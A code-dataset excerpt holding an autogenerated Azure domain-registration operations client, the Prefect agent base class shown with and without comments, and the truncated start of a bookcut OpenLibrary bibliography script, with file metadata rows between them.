request.url = self._client.format_url(request.url)
else:
request = build_list_operations_request(
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("CsmOperationCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_operations.metadata = {'url': '/providers/Microsoft.DomainRegistration/operations'} # type: ignore
| 41.120567 | 133 | 0.673163 |
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_operations_request(
**kwargs: Any
) -> HttpRequest:
api_version = "2020-06-01"
accept = "application/json"
url = kwargs.pop("template_url", '/providers/Microsoft.DomainRegistration/operations')
query_parameters = kwargs.pop("params", {})
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
header_parameters = kwargs.pop("headers", {})
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
class DomainRegistrationProviderOperations(object):
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list_operations(
self,
**kwargs: Any
) -> Iterable["_models.CsmOperationCollection"]:
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_operations_request(
template_url=self.list_operations.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_operations_request(
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("CsmOperationCollection", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_operations.metadata = {'url': '/providers/Microsoft.DomainRegistration/operations'}
| true | true |
1c30418c3026c3a9282d3709ebe6c9102418233c | 23,942 | py | Python | src/prefect/agent/agent.py | Ashton-Sidhu/prefect | a88c86174b70b9de6c110f1c1524b70d4b18b96e | [
"Apache-2.0"
] | 2 | 2020-09-04T10:05:55.000Z | 2020-09-04T10:06:32.000Z | src/prefect/agent/agent.py | workflowmate/prefect | b893c5c69fecd1d66786bbe4c3cc6264d759f1e6 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | src/prefect/agent/agent.py | workflowmate/prefect | b893c5c69fecd1d66786bbe4c3cc6264d759f1e6 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | import functools
import logging
import math
import os
import signal
import sys
import threading
import time
from concurrent.futures import Future, ThreadPoolExecutor
from contextlib import contextmanager
from typing import Any, Generator, Iterable, Set, Optional, cast
from urllib.parse import urlparse
import pendulum
from tornado import web
from tornado.ioloop import IOLoop
from prefect import config
from prefect.client import Client
from prefect.engine.state import Failed, Submitted
from prefect.serialization import state
from prefect.utilities.context import context
from prefect.utilities.exceptions import AuthorizationError
from prefect.utilities.graphql import GraphQLResult, with_args
ascii_name = r"""
____ __ _ _ _
| _ \ _ __ ___ / _| ___ ___| |_ / \ __ _ ___ _ __ | |_
| |_) | '__/ _ \ |_ / _ \/ __| __| / _ \ / _` |/ _ \ '_ \| __|
| __/| | | __/ _| __/ (__| |_ / ___ \ (_| | __/ | | | |_
|_| |_| \___|_| \___|\___|\__| /_/ \_\__, |\___|_| |_|\__|
|___/
"""
# Event to notify agent process to start looking for available flow runs.
AGENT_WAKE_EVENT = threading.Event()
@contextmanager
def exit_handler(agent: "Agent") -> Generator:
exit_event = threading.Event()
def _exit_handler(*args: Any, **kwargs: Any) -> None:
agent.logger.info("Keyboard Interrupt received: Agent is shutting down.")
exit_event.set()
AGENT_WAKE_EVENT.set()
original = signal.getsignal(signal.SIGINT)
try:
signal.signal(signal.SIGINT, _exit_handler)
yield exit_event
except SystemExit:
pass
finally:
signal.signal(signal.SIGINT, original)
class HealthHandler(web.RequestHandler):
"""Respond to /api/health"""
def get(self) -> None:
# Empty json blob, may add more info later
self.write({})
class PokeHandler(web.RequestHandler):
"""Respond to /api/poke
The handler is expected to be called by user to notify agent of available
flow runs waiting for execution.
"""
def get(self) -> None:
# Wake up agent that might be waiting for interval loop to complete.
AGENT_WAKE_EVENT.set()
class Agent:
"""
Base class for Agents. Information on using the Prefect agents can be found at
https://docs.prefect.io/orchestration/agents/overview.html
This Agent class is a standard point for executing Flows in Prefect Cloud. It is meant to
have subclasses which inherit functionality from this class. The only piece that the
subclasses should implement is the `deploy_flows` function, which specifies how to run a
Flow on the given platform. It is built in this way to keep Prefect Cloud logic standard
but allows for platform specific customizability.
In order for this to operate `PREFECT__CLOUD__AGENT__AUTH_TOKEN` must be set as an
environment variable or in your user configuration file.
Args:
- name (str, optional): An optional name to give this agent. Can also be set through
the environment variable `PREFECT__CLOUD__AGENT__NAME`. Defaults to "agent"
- labels (List[str], optional): a list of labels, which are arbitrary string
identifiers used by Prefect Agents when polling for work
- env_vars (dict, optional): a dictionary of environment variables and values that will
be set on each flow run that this agent submits for execution
- max_polls (int, optional): maximum number of times the agent will poll Prefect Cloud
for flow runs; defaults to infinite
- agent_address (str, optional): Address to serve internal api at. Currently this is
just health checks for use by an orchestration layer. Leave blank for no api server
(default).
- no_cloud_logs (bool, optional): Disable logging to a Prefect backend for this agent
and all deployed flow runs
"""
def __init__(
self,
name: str = None,
labels: Iterable[str] = None,
env_vars: dict = None,
max_polls: int = None,
agent_address: str = None,
no_cloud_logs: bool = False,
) -> None:
self.name = name or config.cloud.agent.get("name", "agent")
self.labels = labels or list(config.cloud.agent.get("labels", []))
self.env_vars = env_vars or config.cloud.agent.get("env_vars", dict())
self.max_polls = max_polls
self.log_to_cloud = False if no_cloud_logs else True
self.agent_address = agent_address or config.cloud.agent.get(
"agent_address", ""
)
self._api_server = None # type: ignore
self._api_server_loop = None # type: Optional[IOLoop]
self._api_server_thread = None # type: Optional[threading.Thread]
logger = logging.getLogger(self.name)
logger.setLevel(config.cloud.agent.get("level"))
if not any([isinstance(h, logging.StreamHandler) for h in logger.handlers]):
ch = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter(context.config.logging.format)
formatter.converter = time.gmtime # type: ignore
ch.setFormatter(formatter)
logger.addHandler(ch)
self.logger = logger
self.submitting_flow_runs = set() # type: Set[str]
self.logger.debug("Verbose logs enabled")
self.logger.debug(f"Environment variables: {[*self.env_vars]}")
self.logger.debug(f"Max polls: {self.max_polls}")
self.logger.debug(f"Agent address: {self.agent_address}")
self.logger.debug(f"Log to Cloud: {self.log_to_cloud}")
token = config.cloud.agent.get("auth_token")
self.logger.debug(f"Prefect backend: {config.backend}")
self.client = Client(api_token=token)
def _verify_token(self, token: str) -> None:
"""
Checks whether a token with a `RUNNER` scope was provided
Args:
- token (str): The provided agent token to verify
Raises:
- AuthorizationError: if token is empty or does not have a RUNNER role
"""
if not token:
raise AuthorizationError("No agent API token provided.")
# Check if RUNNER role
result = self.client.graphql(query="query { auth_info { api_token_scope } }")
if (
not result.data # type: ignore
or result.data.auth_info.api_token_scope != "RUNNER" # type: ignore
):
raise AuthorizationError("Provided token does not have a RUNNER scope.")
def _register_agent(self) -> str:
"""
Register this agent with Prefect Cloud and retrieve agent ID
Returns:
- The agent ID as a string
"""
agent_id = self.client.register_agent(
agent_type=type(self).__name__, name=self.name, labels=self.labels # type: ignore
)
self.logger.debug(f"Agent ID: {agent_id}")
return agent_id
def start(self, _loop_intervals: dict = None) -> None:
"""
The main entrypoint to the agent. This function loops and constantly polls for
new flow runs to deploy
Args:
- _loop_intervals (dict, optional): Exposed for testing only.
"""
if config.backend == "cloud":
self._verify_token(self.client.get_auth_token())
self.client.attach_headers({"X-PREFECT-AGENT-ID": self._register_agent()})
try:
self.setup()
with exit_handler(self) as exit_event:
# Loop intervals for query sleep backoff
loop_intervals = _loop_intervals or {
0: 0.25,
1: 0.5,
2: 1.0,
3: 2.0,
4: 4.0,
5: 8.0,
6: 10.0,
}
index = 0
remaining_polls = math.inf if self.max_polls is None else self.max_polls
# the max workers default has changed in 3.8. For stable results the
# default 3.8 behavior is elected here.
max_workers = min(32, (os.cpu_count() or 1) + 4)
with ThreadPoolExecutor(max_workers=max_workers) as executor:
self.logger.debug("Max Workers: {}".format(max_workers))
while not exit_event.is_set() and remaining_polls:
# Reset the event in case it was set by poke handler.
AGENT_WAKE_EVENT.clear()
self.heartbeat()
if self.agent_process(executor):
index = 0
elif index < max(loop_intervals.keys()):
index += 1
remaining_polls -= 1
self.logger.debug(
"Next query for flow runs in {} seconds".format(
loop_intervals[index]
)
)
# Wait for loop interval timeout or agent to be poked by
# external process before querying for flow runs again.
AGENT_WAKE_EVENT.wait(timeout=loop_intervals[index])
finally:
self.cleanup()
def setup(self) -> None:
self.agent_connect()
if self.agent_address:
parsed = urlparse(self.agent_address)
if not parsed.port:
raise ValueError("Must specify port in agent address")
port = cast(int, parsed.port)
hostname = parsed.hostname or ""
app = web.Application(
[("/api/health", HealthHandler), ("/api/poke", PokeHandler)]
)
def run() -> None:
self.logger.debug(
f"Agent API server listening on port {self.agent_address}"
)
self._api_server = app.listen(port, address=hostname) # type: ignore
self._api_server_loop = IOLoop.current()
self._api_server_loop.start() # type: ignore
self._api_server_thread = threading.Thread(
name="api-server", target=run, daemon=True
)
self._api_server_thread.start()
def cleanup(self) -> None:
self.on_shutdown()
if self._api_server is not None:
self.logger.debug("Stopping agent API server")
self._api_server.stop()
if self._api_server_loop is not None:
self.logger.debug("Stopping agent API server loop")
def stop_server() -> None:
try:
loop = cast(IOLoop, self._api_server_loop)
loop.stop()
except Exception:
pass
self._api_server_loop.add_callback(stop_server)
if self._api_server_thread is not None:
self.logger.debug("Joining agent API threads")
# Give the server a small period to shutdown nicely, otherwise it
# will terminate on exit anyway since it's a daemon thread.
self._api_server_thread.join(timeout=1)
def on_shutdown(self) -> None:
"""
Invoked when the event loop is exiting and the agent is shutting down. Intended
as a hook for child classes to optionally implement.
"""
def agent_connect(self) -> None:
"""
Verify agent connection to Prefect API by querying
"""
print(ascii_name)
self.logger.info(
"Starting {} with labels {}".format(type(self).__name__, self.labels)
)
self.logger.info(
"Agent documentation can be found at https://docs.prefect.io/orchestration/"
)
self.logger.info(
"Agent connecting to the Prefect API at {}".format(config.cloud.api)
)
try:
self.client.graphql(query="query { hello }")
except Exception as exc:
self.logger.error(
"There was an error connecting to {}".format(config.cloud.api)
)
self.logger.error(exc)
self.logger.info("Waiting for flow runs...")
def deploy_and_update_flow_run(self, flow_run: "GraphQLResult") -> None:
"""
Deploy a flow run and update Cloud with the resulting deployment info.
If any errors occur when submitting the flow run, capture the error and log to Cloud.
Args:
- flow_run (GraphQLResult): The specific flow run to deploy
"""
# Deploy flow run and mark failed if any deployment error
try:
self.update_state(flow_run)
deployment_info = self.deploy_flow(flow_run)
if getattr(flow_run, "id", None):
self.client.write_run_logs(
[
dict(
flow_run_id=getattr(flow_run, "id"), # type: ignore
name=self.name,
message="Submitted for execution: {}".format(
deployment_info
),
level="INFO",
)
]
)
except Exception as exc:
# if the state update failed, we don't want to follow up with another state update
if "State update failed" in str(exc):
self.logger.debug("Updating Flow Run state failed: {}".format(str(exc)))
return
self.logger.error(
"Logging platform error for flow run {}".format(
getattr(flow_run, "id", "UNKNOWN") # type: ignore
)
)
if getattr(flow_run, "id", None):
self.client.write_run_logs(
[
dict(
flow_run_id=getattr(flow_run, "id"), # type: ignore
name=self.name,
message=str(exc),
level="ERROR",
)
]
)
self.mark_failed(flow_run=flow_run, exc=exc)
def on_flow_run_deploy_attempt(self, fut: "Future", flow_run_id: str) -> None:
"""
Indicates that a flow run deployment has been deployed (successfully or otherwise).
This is intended to be a future callback hook, called in the agent's main thread
when the background thread has completed the deploy_and_update_flow_run() call, either
successfully, in error, or cancelled. In all cases the agent should be open to
attempting to deploy the flow run if the flow run id is still in the Cloud run queue.
Args:
- fut (Future): a callback requirement, the future which has completed or been
cancelled.
- flow_run_id (str): the id of the flow run that the future represents.
"""
self.submitting_flow_runs.remove(flow_run_id)
self.logger.debug("Completed flow run submission (id: {})".format(flow_run_id))
def agent_process(self, executor: "ThreadPoolExecutor") -> bool:
"""
Full process for finding flow runs, updating states, and deploying.
Args:
- executor (ThreadPoolExecutor): the interface to submit flow deployments in
background threads
Returns:
- bool: whether or not flow runs were found
"""
flow_runs = None
try:
flow_runs = self.query_flow_runs()
if flow_runs:
self.logger.info(
"Found {} flow run(s) to submit for execution.".format(
len(flow_runs)
)
)
for flow_run in flow_runs:
fut = executor.submit(self.deploy_and_update_flow_run, flow_run)
self.submitting_flow_runs.add(flow_run.id)
fut.add_done_callback(
functools.partial(
self.on_flow_run_deploy_attempt, flow_run_id=flow_run.id
)
)
except Exception as exc:
self.logger.error(exc)
return bool(flow_runs)
def query_flow_runs(self) -> list:
"""
Query Prefect Cloud for flow runs which need to be deployed and executed
Returns:
- list: A list of GraphQLResult flow run objects
"""
self.logger.debug("Querying for flow runs")
# keep a copy of what was curringly running before the query (future callbacks may be
# updating this set)
currently_submitting_flow_runs = self.submitting_flow_runs.copy()
# Get scheduled flow runs from queue
mutation = {
"mutation($input: get_runs_in_queue_input!)": {
"get_runs_in_queue(input: $input)": {"flow_run_ids"}
}
}
now = pendulum.now("UTC")
result = self.client.graphql(
mutation,
variables={
"input": {
"before": now.isoformat(),
"labels": list(self.labels),
"tenant_id": self.client._active_tenant_id,
}
},
)
# we queried all of the available flow runs, however, some may have already been pulled
# by this agent and are in the process of being submitted in the background. We do not
# want to act on these "duplicate" flow runs until we've been assured that the background
# thread has attempted to submit the work (successful or otherwise).
flow_run_ids = set(result.data.get_runs_in_queue.flow_run_ids) # type: ignore
if flow_run_ids:
msg = "Found flow runs {}".format(
result.data.get_runs_in_queue.flow_run_ids
)
else:
msg = "No flow runs found"
already_submitting = flow_run_ids & currently_submitting_flow_runs
target_flow_run_ids = flow_run_ids - already_submitting
if already_submitting:
msg += " ({} already submitting: {})".format(
len(already_submitting), list(already_submitting)
)
self.logger.debug(msg)
# Query metadata for flow runs found in queue
query = {
"query": {
with_args(
"flow_run",
{
# match flow runs in the flow_run_ids list
"where": {
"id": {"_in": list(target_flow_run_ids)},
"_or": [
# who are EITHER scheduled...
{"state": {"_eq": "Scheduled"}},
# OR running with task runs scheduled to start more than 3
# seconds ago
{
"state": {"_eq": "Running"},
"task_runs": {
"state_start_time": {
"_lte": str(now.subtract(seconds=3)) # type: ignore
}
},
},
],
}
},
): {
"id": True,
"version": True,
"state": True,
"serialized_state": True,
"parameters": True,
"flow": {
"id",
"name",
"environment",
"storage",
"version",
"core_version",
},
with_args(
"task_runs",
{
"where": {
"state_start_time": {
"_lte": str(now.subtract(seconds=3)) # type: ignore
}
}
},
): {"id", "version", "task_id", "serialized_state"},
}
}
}
if target_flow_run_ids:
self.logger.debug("Querying flow run metadata")
result = self.client.graphql(query)
return result.data.flow_run # type: ignore
else:
return []
def update_state(self, flow_run: GraphQLResult) -> None:
"""
After a flow run is grabbed this function sets the state to Submitted so it
won't be picked up by any other processes
Args:
- flow_run (GraphQLResult): A GraphQLResult flow run object
"""
self.logger.debug(
"Updating states for flow run {}".format(flow_run.id) # type: ignore
)
# Set flow run state to `Submitted` if it is currently `Scheduled`
if state.StateSchema().load(flow_run.serialized_state).is_scheduled():
self.logger.debug(
"Flow run {} is in a Scheduled state, updating to Submitted".format(
flow_run.id # type: ignore
)
)
self.client.set_flow_run_state(
flow_run_id=flow_run.id,
version=flow_run.version,
state=Submitted(
message="Submitted for execution",
state=state.StateSchema().load(flow_run.serialized_state),
),
)
# Set task run states to `Submitted` if they are currently `Scheduled`
for task_run in flow_run.task_runs:
if state.StateSchema().load(task_run.serialized_state).is_scheduled():
self.logger.debug(
"Task run {} is in a Scheduled state, updating to Submitted".format(
task_run.id # type: ignore
)
)
self.client.set_task_run_state(
task_run_id=task_run.id,
version=task_run.version,
state=Submitted(
message="Submitted for execution.",
state=state.StateSchema().load(task_run.serialized_state),
),
)
def mark_failed(self, flow_run: GraphQLResult, exc: Exception) -> None:
"""
Mark a flow run as `Failed`
Args:
- flow_run (GraphQLResult): A GraphQLResult flow run object
- exc (Exception): An exception that was raised to use as the `Failed`
message
"""
self.client.set_flow_run_state(
flow_run_id=flow_run.id,
version=flow_run.version,
state=Failed(message=str(exc)),
)
self.logger.error("Error while deploying flow: {}".format(repr(exc)))
def deploy_flow(self, flow_run: GraphQLResult) -> str:
"""
Meant to be overridden by a platform specific deployment option
Args:
- flow_run (GraphQLResult): A GraphQLResult flow run object
Returns:
- str: Information about the deployment
Raises:
- ValueError: if deployment attempted on unsupported Storage type
"""
raise NotImplementedError()
def heartbeat(self) -> None:
"""
Meant to be overridden by a platform specific heartbeat option
"""
if __name__ == "__main__":
Agent().start()
| 37.823065 | 97 | 0.544817 | import functools
import logging
import math
import os
import signal
import sys
import threading
import time
from concurrent.futures import Future, ThreadPoolExecutor
from contextlib import contextmanager
from typing import Any, Generator, Iterable, Set, Optional, cast
from urllib.parse import urlparse
import pendulum
from tornado import web
from tornado.ioloop import IOLoop
from prefect import config
from prefect.client import Client
from prefect.engine.state import Failed, Submitted
from prefect.serialization import state
from prefect.utilities.context import context
from prefect.utilities.exceptions import AuthorizationError
from prefect.utilities.graphql import GraphQLResult, with_args
ascii_name = r"""
____ __ _ _ _
| _ \ _ __ ___ / _| ___ ___| |_ / \ __ _ ___ _ __ | |_
| |_) | '__/ _ \ |_ / _ \/ __| __| / _ \ / _` |/ _ \ '_ \| __|
| __/| | | __/ _| __/ (__| |_ / ___ \ (_| | __/ | | | |_
|_| |_| \___|_| \___|\___|\__| /_/ \_\__, |\___|_| |_|\__|
|___/
"""
AGENT_WAKE_EVENT = threading.Event()
@contextmanager
def exit_handler(agent: "Agent") -> Generator:
exit_event = threading.Event()
def _exit_handler(*args: Any, **kwargs: Any) -> None:
agent.logger.info("Keyboard Interrupt received: Agent is shutting down.")
exit_event.set()
AGENT_WAKE_EVENT.set()
original = signal.getsignal(signal.SIGINT)
try:
signal.signal(signal.SIGINT, _exit_handler)
yield exit_event
except SystemExit:
pass
finally:
signal.signal(signal.SIGINT, original)
class HealthHandler(web.RequestHandler):
def get(self) -> None:
self.write({})
class PokeHandler(web.RequestHandler):
def get(self) -> None:
AGENT_WAKE_EVENT.set()
class Agent:
def __init__(
self,
name: str = None,
labels: Iterable[str] = None,
env_vars: dict = None,
max_polls: int = None,
agent_address: str = None,
no_cloud_logs: bool = False,
) -> None:
self.name = name or config.cloud.agent.get("name", "agent")
self.labels = labels or list(config.cloud.agent.get("labels", []))
self.env_vars = env_vars or config.cloud.agent.get("env_vars", dict())
self.max_polls = max_polls
self.log_to_cloud = False if no_cloud_logs else True
self.agent_address = agent_address or config.cloud.agent.get(
"agent_address", ""
)
self._api_server = None
self._api_server_loop = None
self._api_server_thread = None
logger = logging.getLogger(self.name)
logger.setLevel(config.cloud.agent.get("level"))
if not any([isinstance(h, logging.StreamHandler) for h in logger.handlers]):
ch = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter(context.config.logging.format)
formatter.converter = time.gmtime
ch.setFormatter(formatter)
logger.addHandler(ch)
self.logger = logger
self.submitting_flow_runs = set()
self.logger.debug("Verbose logs enabled")
self.logger.debug(f"Environment variables: {[*self.env_vars]}")
self.logger.debug(f"Max polls: {self.max_polls}")
self.logger.debug(f"Agent address: {self.agent_address}")
self.logger.debug(f"Log to Cloud: {self.log_to_cloud}")
token = config.cloud.agent.get("auth_token")
self.logger.debug(f"Prefect backend: {config.backend}")
self.client = Client(api_token=token)
def _verify_token(self, token: str) -> None:
if not token:
raise AuthorizationError("No agent API token provided.")
result = self.client.graphql(query="query { auth_info { api_token_scope } }")
if (
not result.data
or result.data.auth_info.api_token_scope != "RUNNER"
):
raise AuthorizationError("Provided token does not have a RUNNER scope.")
def _register_agent(self) -> str:
agent_id = self.client.register_agent(
agent_type=type(self).__name__, name=self.name, labels=self.labels
)
self.logger.debug(f"Agent ID: {agent_id}")
return agent_id
def start(self, _loop_intervals: dict = None) -> None:
if config.backend == "cloud":
self._verify_token(self.client.get_auth_token())
self.client.attach_headers({"X-PREFECT-AGENT-ID": self._register_agent()})
try:
self.setup()
with exit_handler(self) as exit_event:
loop_intervals = _loop_intervals or {
0: 0.25,
1: 0.5,
2: 1.0,
3: 2.0,
4: 4.0,
5: 8.0,
6: 10.0,
}
index = 0
remaining_polls = math.inf if self.max_polls is None else self.max_polls
max_workers = min(32, (os.cpu_count() or 1) + 4)
with ThreadPoolExecutor(max_workers=max_workers) as executor:
self.logger.debug("Max Workers: {}".format(max_workers))
while not exit_event.is_set() and remaining_polls:
AGENT_WAKE_EVENT.clear()
self.heartbeat()
if self.agent_process(executor):
index = 0
elif index < max(loop_intervals.keys()):
index += 1
remaining_polls -= 1
self.logger.debug(
"Next query for flow runs in {} seconds".format(
loop_intervals[index]
)
)
AGENT_WAKE_EVENT.wait(timeout=loop_intervals[index])
finally:
self.cleanup()
def setup(self) -> None:
self.agent_connect()
if self.agent_address:
parsed = urlparse(self.agent_address)
if not parsed.port:
raise ValueError("Must specify port in agent address")
port = cast(int, parsed.port)
hostname = parsed.hostname or ""
app = web.Application(
[("/api/health", HealthHandler), ("/api/poke", PokeHandler)]
)
def run() -> None:
self.logger.debug(
f"Agent API server listening on port {self.agent_address}"
)
self._api_server = app.listen(port, address=hostname)
self._api_server_loop = IOLoop.current()
self._api_server_loop.start()
self._api_server_thread = threading.Thread(
name="api-server", target=run, daemon=True
)
self._api_server_thread.start()
def cleanup(self) -> None:
self.on_shutdown()
if self._api_server is not None:
self.logger.debug("Stopping agent API server")
self._api_server.stop()
if self._api_server_loop is not None:
self.logger.debug("Stopping agent API server loop")
def stop_server() -> None:
try:
loop = cast(IOLoop, self._api_server_loop)
loop.stop()
except Exception:
pass
self._api_server_loop.add_callback(stop_server)
if self._api_server_thread is not None:
self.logger.debug("Joining agent API threads")
self._api_server_thread.join(timeout=1)
def on_shutdown(self) -> None:
def agent_connect(self) -> None:
print(ascii_name)
self.logger.info(
"Starting {} with labels {}".format(type(self).__name__, self.labels)
)
self.logger.info(
"Agent documentation can be found at https://docs.prefect.io/orchestration/"
)
self.logger.info(
"Agent connecting to the Prefect API at {}".format(config.cloud.api)
)
try:
self.client.graphql(query="query { hello }")
except Exception as exc:
self.logger.error(
"There was an error connecting to {}".format(config.cloud.api)
)
self.logger.error(exc)
self.logger.info("Waiting for flow runs...")
def deploy_and_update_flow_run(self, flow_run: "GraphQLResult") -> None:
# Deploy flow run and mark failed if any deployment error
try:
self.update_state(flow_run)
deployment_info = self.deploy_flow(flow_run)
if getattr(flow_run, "id", None):
self.client.write_run_logs(
[
dict(
flow_run_id=getattr(flow_run, "id"), # type: ignore
name=self.name,
message="Submitted for execution: {}".format(
deployment_info
),
level="INFO",
)
]
)
except Exception as exc:
# if the state update failed, we don't want to follow up with another state update
if "State update failed" in str(exc):
self.logger.debug("Updating Flow Run state failed: {}".format(str(exc)))
return
self.logger.error(
"Logging platform error for flow run {}".format(
getattr(flow_run, "id", "UNKNOWN")
)
)
if getattr(flow_run, "id", None):
self.client.write_run_logs(
[
dict(
flow_run_id=getattr(flow_run, "id"),
name=self.name,
message=str(exc),
level="ERROR",
)
]
)
self.mark_failed(flow_run=flow_run, exc=exc)
def on_flow_run_deploy_attempt(self, fut: "Future", flow_run_id: str) -> None:
self.submitting_flow_runs.remove(flow_run_id)
self.logger.debug("Completed flow run submission (id: {})".format(flow_run_id))
def agent_process(self, executor: "ThreadPoolExecutor") -> bool:
flow_runs = None
try:
flow_runs = self.query_flow_runs()
if flow_runs:
self.logger.info(
"Found {} flow run(s) to submit for execution.".format(
len(flow_runs)
)
)
for flow_run in flow_runs:
fut = executor.submit(self.deploy_and_update_flow_run, flow_run)
self.submitting_flow_runs.add(flow_run.id)
fut.add_done_callback(
functools.partial(
self.on_flow_run_deploy_attempt, flow_run_id=flow_run.id
)
)
except Exception as exc:
self.logger.error(exc)
return bool(flow_runs)
def query_flow_runs(self) -> list:
self.logger.debug("Querying for flow runs")
currently_submitting_flow_runs = self.submitting_flow_runs.copy()
mutation = {
"mutation($input: get_runs_in_queue_input!)": {
"get_runs_in_queue(input: $input)": {"flow_run_ids"}
}
}
now = pendulum.now("UTC")
result = self.client.graphql(
mutation,
variables={
"input": {
"before": now.isoformat(),
"labels": list(self.labels),
"tenant_id": self.client._active_tenant_id,
}
},
)
# thread has attempted to submit the work (successful or otherwise).
flow_run_ids = set(result.data.get_runs_in_queue.flow_run_ids) # type: ignore
if flow_run_ids:
msg = "Found flow runs {}".format(
result.data.get_runs_in_queue.flow_run_ids
)
else:
msg = "No flow runs found"
already_submitting = flow_run_ids & currently_submitting_flow_runs
target_flow_run_ids = flow_run_ids - already_submitting
if already_submitting:
msg += " ({} already submitting: {})".format(
len(already_submitting), list(already_submitting)
)
self.logger.debug(msg)
# Query metadata for flow runs found in queue
query = {
"query": {
with_args(
"flow_run",
{
# match flow runs in the flow_run_ids list
"where": {
"id": {"_in": list(target_flow_run_ids)},
"_or": [
# who are EITHER scheduled...
{"state": {"_eq": "Scheduled"}},
# OR running with task runs scheduled to start more than 3
# seconds ago
{
"state": {"_eq": "Running"},
"task_runs": {
"state_start_time": {
"_lte": str(now.subtract(seconds=3)) # type: ignore
}
},
},
],
}
},
): {
"id": True,
"version": True,
"state": True,
"serialized_state": True,
"parameters": True,
"flow": {
"id",
"name",
"environment",
"storage",
"version",
"core_version",
},
with_args(
"task_runs",
{
"where": {
"state_start_time": {
"_lte": str(now.subtract(seconds=3)) # type: ignore
}
}
},
): {"id", "version", "task_id", "serialized_state"},
}
}
}
if target_flow_run_ids:
self.logger.debug("Querying flow run metadata")
result = self.client.graphql(query)
return result.data.flow_run # type: ignore
else:
return []
def update_state(self, flow_run: GraphQLResult) -> None:
self.logger.debug(
"Updating states for flow run {}".format(flow_run.id) # type: ignore
)
# Set flow run state to `Submitted` if it is currently `Scheduled`
if state.StateSchema().load(flow_run.serialized_state).is_scheduled():
self.logger.debug(
"Flow run {} is in a Scheduled state, updating to Submitted".format(
flow_run.id # type: ignore
)
)
self.client.set_flow_run_state(
flow_run_id=flow_run.id,
version=flow_run.version,
state=Submitted(
message="Submitted for execution",
state=state.StateSchema().load(flow_run.serialized_state),
),
)
# Set task run states to `Submitted` if they are currently `Scheduled`
for task_run in flow_run.task_runs:
if state.StateSchema().load(task_run.serialized_state).is_scheduled():
self.logger.debug(
"Task run {} is in a Scheduled state, updating to Submitted".format(
task_run.id # type: ignore
)
)
self.client.set_task_run_state(
task_run_id=task_run.id,
version=task_run.version,
state=Submitted(
message="Submitted for execution.",
state=state.StateSchema().load(task_run.serialized_state),
),
)
def mark_failed(self, flow_run: GraphQLResult, exc: Exception) -> None:
self.client.set_flow_run_state(
flow_run_id=flow_run.id,
version=flow_run.version,
state=Failed(message=str(exc)),
)
self.logger.error("Error while deploying flow: {}".format(repr(exc)))
def deploy_flow(self, flow_run: GraphQLResult) -> str:
raise NotImplementedError()
def heartbeat(self) -> None:
if __name__ == "__main__":
Agent().start()
| true | true |
1c304688836feeccfaa7f34d41a25f173cdb04b9 | 2,543 | py | Python | bookcut/bibliography.py | jonasw234/bookcut | c159e6f9374b55744115545fb96a73ab78255bd5 | [
"MIT"
] | null | null | null | bookcut/bibliography.py | jonasw234/bookcut | c159e6f9374b55744115545fb96a73ab78255bd5 | [
"MIT"
] | null | null | null | bookcut/bibliography.py | jonasw234/bookcut | c159e6f9374b55744115545fb96a73ab78255bd5 | [
"MIT"
] | null | null | null | import requests
import json
import re
from difflib import SequenceMatcher
import os
from bookcut.mirror_checker import pageStatus
'''This file is used by ---allbooks command
It is searching OpenLibrary for all books written from an
author, and gives the choice to user to save it to a .txt file'''
OPEN_LIBRARY_URL = 'http://www.openlibrary.org'
def main(author, similarity):
# returns all the books writen by an author from openlibrary
# using similarity for filtering the results
status = pageStatus(OPEN_LIBRARY_URL)
if status is not False:
search_url = "http://openlibrary.org/search.json?author=" + author
jason = requests.get(search_url)
jason = jason.text
data = json.loads(jason)
data = data['docs']
if data != []:
metr = 0
books = []
